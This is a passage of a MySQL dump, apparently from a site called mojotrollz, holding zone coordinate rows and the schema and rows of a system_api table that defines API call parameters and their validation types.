`mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5733, '', 933.333, -256.25, 1702.08, 908.333); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5736, '', 4979.17, 2308.33, 1785.42, 6.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5785, '', 1452.08, -5531.25, 3652.08, -1002.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5788, '', -4650, -5902.08, 3766.67, 2933.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5789, '', 2260.42, -1035.42, 4697.92, 2500); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5799, '', 2660.42, 389.583, 2918.75, 1404.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5805, '', 2679.17, -1245.83, 1095.83, -1520.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5840, '', 2481.25, -52.084, 1947.92, 260.416); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5841, '', 4839.58, -1418.75, 5618.75, 1445.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5842, '', 7079.17, 1335.42, 4558.33, 729.167); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5844, '', 1791.67, -1252.08, 5327.08, 3297.92); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5861, '', 7268.75, 5410.42, -3322.92, -4562.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5892, '', -833.593, -3940.3, -565.093, -2628.16); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5918, '', 3362.5, 2300, 4210.42, 3502.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5956, '', -2154.17, -2918.75, 1197.92, 687.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5963, '', 1664.58, 814.583, -458.334, -1025); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5976, '', 3133.33, 1333.33, 1666.67, 466.666); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6006, '', 812.5, -981.25, 1689.58, 493.75); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6040, '', -3979.17, -5037.5, -3468.75, -4175); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6051, '', 1743.75, 904.167, 2083.33, 1522.92); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6052, '', 977.083, 60.416, 1372.92, 762.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6066, '', 1597.92, -1708.33, 1612.5, -591.666); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6067, '', -2497.92, -3200, -789.584, -1258.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6101, '', -875, -1343.75, 2389.58, 2077.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6109, '', 2233.33, -1166.67, 2200, -66.666); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6125, '', 2633.33, 33.334, 4866.67, 3133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6126, '', 1320.83, -929.166, 1495.83, -4.16602); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6134, '', 2947.92, -1739.58, -110.416, -3235.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6138, '', 6139.58, 787.5, 1416.67, -2152.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6170, '', 187.5, -781.25, -8570.83, -9216.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6176, '', 979.167, 14.584, -5962.5, -6606.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6182, '', -700, -4100, -3133.33, -5400); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6208, '', 3587.5, 1175, 1608.33, 0); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6209, '', -1397.92, -2322.92, 2372.92, 1756.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6214, '', 5762.5, 4747.92, 2029.17, 1352.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6219, '', 902.083, 145.834, 4008.33, 3504.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6297, '', 1279.17, -243.75, -1714.58, -2729.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6309, '', 1220.83, 314.584, -2564.58, -3168.75); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6328, '', 5616.67, 2933.33, -252.084, -2041.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6419, '', 2102.08, 1372.92, 4168.75, 3683.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6426, '', 747.917, -222.916, 2216.67, 1568.75); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6449, '', 1743.75, 904.167, 2083.33, 1522.92); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6450, '', 1491.67, 41.666, 11033.3, 10066.7); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6451, '', -3641.67, -4991.67, 0, -900); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6452, '', 233.334, -1533.33, -2577.08, -3754.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6453, '', -4491.67, -6297.92, -525, -1729.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6454, '', 2147.92, 1058.33, 2270.83, 1543.75); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6455, '', -5383.33, -6983.33, 10833.3, 9766.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6456, '', -12814.6, -14633.3, -3604.17, -4816.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6457, '', 1206.25, -643.75, -4727.08, -5960.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (6500, '', -3979.17, -5037.5, -3468.75, -4175); /*!40000 ALTER TABLE `mojotrollz_zone` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_api CREATE TABLE IF NOT EXISTS `system_api` ( `ID` int(10) unsigned NOT NULL, `group` int(10) unsigned NOT NULL, `type` tinyint(3) unsigned NOT NULL, `parentID` int(11) NOT NULL, `parentValue` char(50) DEFAULT NULL, `name` char(50) NOT NULL, `verify` char(50) DEFAULT NULL, PRIMARY KEY (`ID`,`group`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_api: 192 rows /*!40000 ALTER TABLE `system_api` DISABLE KEYS */; INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1, 1, 0, -1, NULL, 'page', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (31, 0, 3, 10, 'files', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (30, 0, 2, 10, 'files', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (27, 0, 2, 11, 'create', 'locale', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (26, 0, 2, 11, 'create', 'email', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (10, 0, 0, -1, NULL, 'call', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (11, 0, 0, 10, NULL, 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (20, 0, 2, 11, 'login', 'username', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (21, 0, 2, 11, 'login', 'password_sha', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (22, 0, 2, 11, 'login', 'password_md5', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (23, 0, 2, 11, 'check', 'rightid', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (24, 0, 2, 11, 'create', 'username', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (25, 0, 2, 11, 'create', 'password_sha', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1320, 42, 3, 1300, 'list', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1311, 42, 2, 1300, 'deletedialog', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1310, 42, 2, 1300, 'deletedialog', 'ID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1309, 42, 2, 1300, 'deletecall', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1308, 42, 2, 1300, 'deletecall', 'ID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1307, 42, 2, 1300, 'addcall', 'verify', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1306, 42, 2, 1300, 'addcall', 'name', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1305, 42, 2, 1300, 'addcall', 'parentValue', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1304, 42, 2, 1300, 'addcall', 'parentID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1303, 42, 2, 1300, 'addcall', 'type', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1302, 42, 2, 1300, 'addcall', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1301, 42, 2, 1300, 'addcall', 'ID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1300, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_page', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1211, 42, 2, 1200, 'change', 'status', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1210, 42, 2, 1200, 'change', 'cls', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1209, 42, 2, 1200, 'deldialog', 'cls', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1208, 42, 2, 1200, 'del', 'cls', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1206, 42, 2, 1200, 'add', 'month', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1205, 42, 2, 1200, 'add', 'day_week', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1204, 42, 2, 1200, 'add', 'day', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1203, 42, 2, 1200, 'add', 'hour', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1202, 42, 2, 1200, 'add', 'min', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1201, 42, 2, 1200, 'add', 'cls', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1200, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_cron', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1111, 42, 3, 1100, 'doc', 'doc', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1110, 42, 3, 1100, 'doc', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1101, 42, 3, 1100, 'cat', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1100, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_docu', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1027, 42, 3, 1000, 'dotolist', 'page', 'UINT0'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1026, 42, 3, 1000, 'dotolist', 'search', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1025, 42, 3, 1000, 'dotolist', 'filter', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1022, 42, 3, 1000, 'todolist', 'page', 'UINT0'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1021, 42, 3, 1000, 'todolist', 'search', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1020, 42, 3, 1000, 'todolist', 'filter', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1016, 42, 2, 1000, 'priority_down', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1015, 42, 2, 1000, 'priority_up', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1011, 42, 2, 1000, 'edit', 'message', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1010, 42, 2, 1000, 'edit', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1007, 42, 3, 1000, 'deassign', 'user', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1006, 42, 2, 1000, 'deassign', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1005, 42, 2, 1000, 'assign', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1004, 42, 2, 1000, 'add', 'todo', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (100, 0, 3, 10, 'charcreation', 'json', 'JSON'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (40, 0, 2, 10, 'text', 'request', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (41, 0, 2, 10, 'text', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (10, 1, 2, 1, 'default_info', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (50, 0, 2, 10, 'pages', 'group', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1003, 42, 2, 1000, 'close', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (110, 1, 2, 1, 'wizard_toolbar', 'last', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (111, 1, 2, 1, 'wizard_toolbar', 'next', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1002, 42, 2, 1000, 'open', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1001, 42, 2, 1000, 'todo', 'todo', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1000, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_todo', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (830, 42, 3, 800, 'tab', 'name', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (822, 42, 2, 800, 'rn', 'newid', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (821, 42, 2, 800, 'rn', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (820, 42, 2, 800, 'rn', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (811, 42, 2, 800, 'del', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (810, 42, 2, 800, 'del', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (801, 42, 2, 800, 'upload', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (800, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_files', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (734, 42, 2, 700, 'save', 'text', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (733, 42, 2, 700, 'save', 'tags', 'JSON'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (732, 42, 2, 700, 'save', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (731, 42, 2, 700, 'save', 'new_id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (730, 42, 2, 700, 'save', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (721, 42, 3, 700, 'delete', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (720, 42, 2, 700, 'delete', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (716, 42, 2, 700, 'editor', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (715, 42, 2, 700, 'editor', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (713, 42, 2, 700, 'edittext', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (712, 42, 2, 700, 'edittext', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (710, 42, 2, 700, 'loadByTag', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (706, 42, 3, 700, 'tag', 'page', 'UINT0'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (705, 42, 3, 700, 'tag', 'search', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (704, 42, 3, 700, 'tag', 'filter', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (703, 42, 3, 700, 'tag', 'tag', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (700, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_text', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (620, 42, 3, 600, 'list', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (611, 42, 2, 600, 'deletedialog', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (610, 42, 2, 600, 'deletedialog', 'ID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (609, 42, 2, 600, 'deletecall', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (608, 42, 2, 600, 'deletecall', 'ID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (607, 42, 2, 600, 'addcall', 'verify', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (606, 42, 2, 600, 'addcall', 'name', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (605, 42, 2, 600, 'addcall', 'parentValue', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (604, 42, 2, 600, 'addcall', 'parentID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (603, 42, 2, 600, 'addcall', 'type', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (602, 42, 2, 600, 'addcall', 'group', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (601, 42, 2, 600, 'addcall', 'ID', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (600, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_api', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (500, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_config', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (400, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_mod', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (341, 42, 2, 300, 'deleterightuser', 'userid', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (340, 42, 2, 300, 'deleterightuser', 'rightid', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (331, 42, 2, 300, 'addrightuser', 'userid', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (330, 42, 2, 300, 'addrightuser', 'rightid', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (321, 42, 2, 300, 'deleterightconfirm', 'id', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (320, 42, 2, 300, 'deleteright', 'id', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (312, 42, 2, 300, 'addright', 'description', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (311, 42, 2, 300, 'addright', 'name', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (310, 42, 2, 300, 'addright', 'id', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (304, 42, 3, 300, 'users', 'page', 'UINT0'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (303, 42, 3, 300, 'users', 'search', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (120, 1, 3, 1, 'wizard_skills', 't', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (121, 1, 2, 1, 'user_achievements_menu_sub', 'menu', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (131, 1, 2, 1, 'user_achievements_content', 'filter', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (130, 1, 2, 1, 'user_achievements_content', 'menu', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (132, 0, 2, 10, 'quest', 'entry', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (133, 0, 2, 10, 'creature', 'entry', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (302, 42, 3, 300, 'users', 'filter', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (122, 1, 2, 1, 'user_nexus_menu_sub', 'menu', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (123, 1, 2, 1, 'user_nexus_content', 'menu', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (124, 1, 2, 1, 'user_nexus_content', 'filter', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (301, 42, 2, 300, 'user', 